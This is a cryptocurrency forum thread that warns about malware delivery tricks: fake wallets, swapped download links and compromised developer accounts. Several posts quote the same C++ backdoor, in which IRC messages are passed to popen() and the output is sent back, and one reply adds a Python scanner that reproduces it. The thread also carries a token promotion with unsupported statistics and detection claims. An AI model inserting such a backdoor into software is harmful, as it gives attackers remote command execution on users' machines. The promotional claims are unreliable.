Topic: Beware of Increasingly Sophisticated Malware Infection Attempts (Read 681403 times)

full member
Activity: 280
Merit: 110
Eloncoin.org - Mars, here we come!
Yes, the points you mentioned are very technical and clear, but the last one is the key to the door of a safe trading era. You have to keep a device for daily activities that has no link with your trading device; it has a number of reasons.

Nowadays scamming has increased so much and the techniques are so efficient that if you use a PC or mobile, it surely will be subjected to some malware. It has become almost impossible to avoid such activities; although anti-malware companies are developing software, they're not meeting the requirements. So the best way to keep yourself safe is to keep a separate mobile for crypto use and don't download unnecessary files and software.
newbie
Activity: 50
Merit: 0
My friend's account got swiped with a keyboard malware virus, just coz he did copy and paste. These scams ain't funny.
hero member
Activity: 770
Merit: 540
I was intrigued by a scam which consists in revealing its mnemonic phrase on a forum, on Twitter or elsewhere.
So I installed one of these wallets, which indeed has funds. I observed what was happening and asked for explanations (from a bitcointalker): there are ERC20 tokens in a wallet, for example, but to transfer them you need fees. The people who install this fraudulent wallet send the fees, which are instantly scanned and sent to another wallet. This is really very clever.
I would like to understand better how it works. From what I understood, the scammers use some kind of robot to instantly send the fees elsewhere.
Yes, you said the truth; almost the same experience as mine. Those guys are very smart and are on standby immediately they get a victim, to move any funds in the wallet they got access to, but I can't really say if they are using a robot to run that shit. Even recently I have been receiving phishing links via email; I don't take time to delete them when I see any of those links.
copper member
Activity: 99
Merit: 3
Instant & Cross Chain Crypto Swaps
Don't download and run unknown files; use VirusTotal or any.run to check "unpopular" applications.

Don't sign transactions or connect web3 wallets such as MetaMask, Trust Wallet etc. to unknown websites.

Do your due diligence, double check URLs, cross check from here or social media. Even when Discords or Twitter make announcements, wait and cross check; sometimes even those platforms get hacked and people use them to make announcements with fraudulent or malicious links that steal your funds.

Basically, always think before you make a move with your crypto.

Again, as many users said, if you have large funds it's best to keep them on a separate device that's not used for daily internet activities such as gaming, downloading, social media etc.
newbie
Activity: 210
Merit: 0
The usual Windows Defender helps me a lot.
The main thing is not to download dubious files.
jr. member
Activity: 53
Merit: 2
This one is actually pretty old, a couple of years I'd say. Now it's more a meme than anything else. The malicious wallet signatures were and still are a pretty dangerous thing.

I was intrigued by a scam which consists in revealing its mnemonic phrase on a forum, on Twitter or elsewhere.
So I installed one of these wallets, which indeed has funds. I observed what was happening and asked for explanations (from a bitcointalker): there are ERC20 tokens in a wallet, for example, but to transfer them you need fees. The people who install this fraudulent wallet send the fees, which are instantly scanned and sent to another wallet. This is really very clever.
I would like to understand better how it works. From what I understood, the scammers use some kind of robot to instantly send the fees elsewhere.
hero member
Activity: 1806
Merit: 772
I love BitBox02 (Shiftcrypto) and Zeus (Cryptotag)
I was intrigued by a scam which consists in revealing its mnemonic phrase on a forum, on Twitter or elsewhere.
So I installed one of these wallets, which indeed has funds. I observed what was happening and asked for explanations (from a bitcointalker): there are ERC20 tokens in a wallet, for example, but to transfer them you need fees. The people who install this fraudulent wallet send the fees, which are instantly scanned and sent to another wallet. This is really very clever.
I would like to understand better how it works. From what I understood, the scammers use some kind of robot to instantly send the fees elsewhere.
copper member
Activity: 99
Merit: 3
Instant & Cross Chain Crypto Swaps
Common things to watch are obviously files; these can come from GitHub, YouTube video description links, Gmail/email attachments and especially torrents, bound with malware and/or stealers. Honestly I'd recommend keeping wallets separate from any computer you do downloads, surfing etc. on. Also with NFTs / DeFi, be careful to make sure what you're signing with your wallet, as it can be drained. Furthermore, never interact with NFTs/coins that just show up or were airdropped into your wallet; as another member stated, interacting with unknown "malicious" smart contracts can end up in a total transfer of your funds. STAY SAFE OUT THERE FOLKS!
hero member
Activity: 924
Merit: 518
fillippone - Winner contest Pizza 2022
There are other ways accounts get hacked: there are some fake projects online that request logins just to get in touch with how someone's password looks; hackers then try these passwords on other accounts of the victims, like their Gmail and blockchain accounts. This point also makes accounts vulnerable to attacks.
Things are getting sophisticated these days in the ways scammers are using to steal from different accounts and wallets. They can even clone a website like the big websites we have that have huge numbers of customers, making it look alike, and then drop the link to their cloned websites on the internet and in different DMs so that once you click it and log in to your account, they will save the password and have access to the account. We need to look out for the different ways many of these scammers are using to steal from us.
newbie
Activity: 105
Merit: 0
When I intend to send some funds, the address is changed: some characters are omitted. That's why when making transactions I used my phone instead of my PC. Does anyone experience this too? If this is a malware infection, what should I do?
jr. member
Activity: 840
Merit: 6
More and more people are writing on social networks about the fact that there are a lot of malware and viruses on MacBook M1. How can I detect and remove them? I may have such software installed.
I haven't heard of any crypto malware or viruses on the MacBook M1 models. They use different code (not x64) and a different OS (Unix based), so they should not be able to get 99% of viruses by default. If you know of any I should look out for, do tell. I actually switched to a MacBook to use Candle Chain and Polygon DApps on MetaMask and have had 0 hacks. I also moved my cold storage to a Tangem wallet, which is safer IMO than a Ledger.
full member
Activity: 1134
Merit: 154
★Bitvest.io★ Play Plinko or Invest!
Wow, in all my time in the crypto space, I never even imagined a virus linked to a coin/token source code which can actually hijack one's wallet. I should be more careful about the kind of coin one transacts these days onward.
newbie
Activity: 14
Merit: 0
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins, so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
// Triggered by any IRC PRIVMSG whose fourth word is ":!"
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    // The remainder of the message line (from the fifth word on) is handed to the shell
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        // Collect the command's standard output
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        // Extract the sender's nick from the ":nick!user@host" prefix
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        // Send the command output back to the sender as a private message
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

The purpose of this document is to make you understand the problem we are facing now with the growing popularity of the crypto markets. Cryptocurrencies and blockchain are a monstrous topic, and the applications of blockchain technologies came with a total lack of regulations to prevent illegal activities. Since the legal context is missing in Decentralized Finance built on top of blockchain technology, we are forced to witness rising DeFi scams.

DeFi rug pulls and exit scams formed 99% of all crypto frauds in 2020. DeFi-related hacks now make up more than 60% of the total hack and theft volume in 2021, a large increase from only 25% in 2020.

Both exit scams and DeFi rug pulls are crypto frauds. Exit scams happen when cryptocurrency promoters disappear with investors' money during or after an initial coin offering (ICO). DeFi rug pulls are a new form of exit scam whereby crypto developers abandon a project and run away with investors' funds.

At the time of writing, between January-April 2021, DeFi scamsters raked in almost $83.4 million. Looking at the broader picture, almost 55% of all major cryptocurrency scams were DeFi hacks. That means out of a total theft amount of $432 million, $240 million can solely be attributed to DeFi. Even sophisticated investors, with a keen eye and understanding of financial details, can fall prey to such scams.




We built a platform for the decentralized finance industry to STOP the explosion of DeFi fraudulent projects that has left many individual investors burned. In the current DeFi marketplace, though, managing your portfolio still requires daily diligence, and that can take up a lot of time. This raises the question: Is there a way to benefit from DeFi without giving away all your time, and potentially all your money, too?

Token utility use cases

Simplified trading

In the current DeFi marketplace, though, managing your portfolio still requires daily diligence, and that can take up a lot of time. This raises the question: Is there a way to benefit from DeFi without giving away all your time, and potentially all your money, too? DeFi may be difficult, but making money from it doesn’t have to be. By aggregating various technologies we make it possible! Your CSD Token acts as a safeguard for your investments.


Automatic scoring mechanism

The auto-scoring mechanism functionality is developed to analyze the various crypto smart contracts, transactions, holders, wallets, and behavior comparisons to give them a score based on well-defined criteria from blockchain experts. We cannot predict asset values on the market and it's not in our scope of work, but we can give you a score to help you make investment decisions. The experimental proof of concept results showed us a high correlation between the scores of the auto-scoring mechanism and the manual scoring. The second layer of human expert crowdsourcing will add a more precise score.


Rug pull and scam detection

Based on the blockchain enterprise subscription plans, we have access to their professional API endpoints to fetch any smart contract data, including pending transactions, so we can easily and instantly detect any movements of funds. As described in previous chapters, our detection mechanism, once triggered, can send notifications to CSD Token holders when specific events trigger the mechanism.



Smart contracts monitoring

Related to the same mechanism, different techniques can be applied with defined patterns to continuously monitor such data in the blockchain.

Address monitor

The same principle can also be applied to user-defined "watchers" to keep an eye on wallet addresses added into the monitor service as a custom job with custom criteria.


Transactions track down

In our early stage, when tests were made as described in the proof of concept chapter, we succeeded without doubt not only in tracking down transactions but also in detecting blockchain shifts and coming back to the original owner, including associating transactions with fraud projects and repetitive transactions with other addresses related to the same practices.

Blockchain shift detection

As described above, we are able to track down transactions outside of the blockchain boundaries, so we can keep track not only in the current network. Following these criteria, if we identify abnormal activity or we link one address to fraud in one network, we already have a bad score applied to the address at the other end. The chances of not being accurate are pretty low.

Behaviour comparison

Starting from the moment when machine learning gets outside of the testing lab stage, as described in the proof of concept chapter, once in the production environment it will add a layer of behavior comparison with past projects using AWS AI scalable instances and save data into our data storage for instant future reports.

User defined instant notifications

At the cost of notification service providers, any CSD Token holder can spend part of their CSD on being notified when specific events trigger defined criteria. CSD Tokens spent on special services like this one will be transferred to the team wallet for operational costs and further improvements of cryptoscamdefence.com.

Smart contracts whitelisting/blacklisting

Terms such as "blacklist" and "whitelist" were commonly used within cybersecurity and infosec circles to simply designate which person or application can access a system or network (and which ones are denied). Our scoring mechanism, once filled with the qualified confirmed result against the detected smart contract scam project, will automatically blacklist it in our data storage and flag it as a highly risky investment, with the option for the contract owner to be whitelisted back once it passes all stages of the validation process, in which the community is also involved.
On top of this validation process, being whitelisted by CryptoScamDefence gives contracts the badge of trust verified by cryptoscamdefence.com and community experts. Our scope of work is not only acting as arbitrage middleware; based on our team's experts, together with the CSD community voice and certified experts, we will also provide enterprise-level audits to support newly created projects in getting popular and trusted by the community and potential investors.

More features to come

The Crypto Scam Defence business model needs continuous improvement and focus on the community voice. Incremental changes to product features are already on the checklist, as continuous upgrades and implementation of any solid new features. Constant feedback from the community is an important aspect of the continuous improvement model. Open communication during every phase of executing an improvement is critical both to the final results of the improvement and to the maintenance and project management costs. Making continuous improvement part of company culture is an excellent and cost-effective approach to tackling an organization's most difficult challenges. When supported by improvement technology, results can be achieved quickly and success can be sustained over time.
jr. member
Activity: 41
Merit: 1
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins, so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
// Triggered by any IRC PRIVMSG whose fourth word is ":!"
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    // The remainder of the message line (from the fifth word on) is handed to the shell
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        // Collect the command's standard output
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        // Extract the sender's nick from the ":nick!user@host" prefix
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        // Send the command output back to the sender as a private message
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.


Good information. However, add some more to make it better. We need more information!
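The backdoor quoted above is invisible to a plain grep for popen() because the call sits behind #define aliases (CRead, CFree, CBuff). As an added example (not code from the original post or from any coin's code base), here is a small Python audit that resolves object-like macros before matching shell-execution sinks, and reports whether each flagged call runs a constant command or one built from runtime data. The sink list and the C++ sample it scans are constructed for the demonstration:

```python
"""Macro-aware audit for shell-execution sinks in C/C++ source.

Added example for this thread, not code from the original post or from
any coin's codebase. It resolves object-like #define aliases first, so a
macro such as `#define CRead popen` cannot hide a popen() call, then flags
every call whose resolved callee hands a string to a shell or exec.
"""
import re

# Functions that hand a string to a shell or exec a program (assumed list).
SHELL_SINKS = {
    "popen", "_popen", "system", "execl", "execlp", "execv", "execvp",
    "execve", "ShellExecuteA", "ShellExecuteW", "WinExec", "CreateProcessA",
}

# Object-like macros only: "#define NAME body" (function-like macros are skipped).
DEFINE_RE = re.compile(r'^\s*#\s*define\s+(\w+)\s+(.+?)\s*$', re.M)
CALL_RE = re.compile(r'\b(\w+)\s*\(')
IDENT_RE = re.compile(r'^\w+$')
LITERAL_ARG_RE = re.compile(r'\s*"[^"]*"\s*[,)]')


def collect_defines(source):
    """Map each object-like macro name to its replacement text."""
    return dict(DEFINE_RE.findall(source))


def resolve(name, defines, depth=8):
    """Follow identifier-to-identifier macro aliases (e.g. CRead -> popen)."""
    for _ in range(depth):
        body = defines.get(name)
        if body is None or not IDENT_RE.match(body):
            break
        name = body
    return name


def audit(source):
    """Return one finding per call whose resolved callee is a shell sink."""
    defines = collect_defines(source)
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # the #define lines themselves are not calls
        for m in CALL_RE.finditer(line):
            alias = m.group(1)
            sink = resolve(alias, defines)
            if sink in SHELL_SINKS:
                rest = line[m.end():]
                findings.append({
                    "line": lineno,
                    "alias": alias,
                    "sink": sink,
                    # A literal first argument is a fixed command; anything
                    # else means the command text comes from runtime data.
                    "constant_command": LITERAL_ARG_RE.match(rest) is not None,
                })
    return findings


# Constructed sample that mirrors the macro-aliased IRC backdoor pattern,
# plus one benign file call and one constant-command shell call.
SAMPLE_SOURCE = r'''
#define CBuff "PRIVMSG"
#define CRead popen
#define CFree pclose
#define CLine FILE

void HandleLine(SOCKET hSocket, const std::string& strLine, std::vector<std::string>& vWords)
{
    if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf) {
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            CFree(buf);
        }
    }
    FILE *log = fopen("debug.log", "a");
    system("sync");
}
'''


if __name__ == "__main__":
    for f in audit(SAMPLE_SOURCE):
        kind = "constant command" if f["constant_command"] else "RUNTIME-BUILT COMMAND"
        print(f'line {f["line"]}: {f["alias"]}() -> {f["sink"]}() [{kind}]')
```

Run it over a real tree with `audit(open(path).read())` per file; the finding that matters is a sink whose command is not a constant literal, which is exactly the pattern in the quoted IRC handler. The macro resolution is deliberately one-level-per-hop and identifier-only, so function-like macros and token pasting would still need a pass over preprocessed output (for example the compiler's -E output) to be caught.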
member
Activity: 812
Merit: 13
Crypto bookmaker and casino
Yes, you are right. Most of the airdrops are not legit and are just a simple strategy employed by hackers to take advantage of the information of airdrop hunters.
It's best to verify the authenticity of an airdrop from the official Telegram of the project before participating.
Thousands of airdrops that are being developed by developers are never legit, and most times they are used to steal data and increase people's vulnerability to hacking without them knowing what they have gotten themselves into. Scammers can decide to create an airdrop allowing innocent people to drop their information to get the airdrop and later use it against them. We should be aware of the different tactics used by scammers.
legendary
Activity: 1372
Merit: 1001
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins, so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
// Triggered by any IRC PRIVMSG whose fourth word is ":!"
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    // The remainder of the message line (from the fifth word on) is handed to the shell
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        // Collect the command's standard output
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        // Extract the sender's nick from the ":nick!user@host" prefix
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        // Send the command output back to the sender as a private message
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
So much malware now, and more and more sophisticated; we need to be wary. Can you share some coin software or some project to keep people alert and stay away? Because I think this is something we should all do and share together.
legendary
Activity: 3710
Merit: 1756
Hello everyone!
I read this thread, and the question arose: are you really running mining, wallets and so on on a PC / laptop that is a storage of critical information? Seriously?
I believe that if you own more or less significant funds, and "work" in this market, then you MUST provide yourself with the conditions of "information hygiene". Ideally, different devices for working with wallets / exchanges, separately for forums etc., separately for mail / telegram / vibe etc., and separately for mining and monitoring.
Antiviruses and other means of protection ALWAYS have relevance with a lag relative to malicious solutions. First a disease appears, then a medicine for it, and nothing else!
copper member
Activity: 224
Merit: 2
TheStandard
Nowadays, malware infection attempts are very sophisticated, even when you exchange swaps on PancakeSwap from anonymous coins like VERA. This is a coin where you just need to perform a swap operation to another coin and immediately you will lose all your balance in the wallet. This is a new sophisticated trick that should be warned about; you should be careful of strange coins being transferred to your wallet.
legendary
Activity: 1708
Merit: 1364
🔃EN>>AR Translator🔃
When will the announcement board be without the possibility of making self-moderated announcements? This helps the scammers too much.

This was suggested several times but seems not to be a priority on the admin to-do list. Note that the altcoin board is considered a spam area and administration seems not to take things seriously here. Not to forget that a user is the first/only one responsible for what he may accept to install onto his device, and those sticky threads at the top of boards are raised flags warning us not to trust anybody and to do enough research on links and software.

My device was increasingly misbehaving last week. I feared malware had entered the device.

Sometimes there is no way to know if the device is really infected or not. The one and only solution is to move important files to an external hard drive before formatting the device. Always take care if your device is connected to the internet all the time.
member
Activity: 430
Merit: 22
Professional user
When will the announcement board be without the possibility of making self-moderated announcements? This helps the scammers too much.